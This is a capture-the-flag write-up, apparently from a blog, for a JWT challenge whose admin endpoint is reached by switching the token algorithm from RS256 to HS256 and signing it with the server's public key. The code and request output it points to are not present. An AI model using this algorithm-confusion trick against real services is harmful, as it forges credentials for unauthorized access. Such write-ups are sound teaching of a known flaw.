JSON Web Token (JWT) - Public key
Medium
Last updated
Medium
Last updated
First endpoint /key provides public key
Second endpoint /auth will provide jwt token with your username (you need to provide it in request body - method POST)
Third endpoint /admin, you check you are admin or not by Authorization: Bearer YOURTOKEN
(you need to provide your token - method POST). If you are admin, you will get the flag.
Firstly, get the public key:
Next, I will try to get a sample jwt token, you can't use admin
as value for username:
Use jwt.io to decode this value:
Payload part is pretty simple, just username
. Pay attention to Headers part, you will see the algorithm is using is RS256
with this algorithm, token will be encode by private and decode by public key,
But we just have public key, so we can't create a new valid token to access /admin
. So what happen if we change the algorithm to HS256
, this algorithm use same key to encode and decode jwt token. Okay, let's try:
Use below code to create a new jwt token use HS256
algorithm:
Use this token, I can access to /admin and get the flag: